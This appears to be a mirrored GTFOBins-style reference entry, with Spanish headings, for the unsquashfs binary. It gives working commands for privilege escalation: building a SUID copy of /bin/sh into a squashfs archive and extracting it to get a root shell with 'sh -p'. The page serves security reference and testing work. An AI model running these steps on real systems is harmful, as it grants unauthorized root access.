root@defcon-rd // ./arsenal/gtfobins/unsquashfs
unsquashfs
Nota
`unsquashfs` preserve the SUID bit when extracting the file system. For example, prepare an archive beforehand with the following commands as root:
```
cp /bin/sh .
chmod +s sh
mksquashfs sh shell
```
./unsquashfs --examples
Funciones y ejemplos de uso
privilege-escalation
unsquashfs shell
./squashfs-root/sh -p
./related --binary=unsquashfs
Binarios relacionados
Comparten al menos una función con unsquashfs.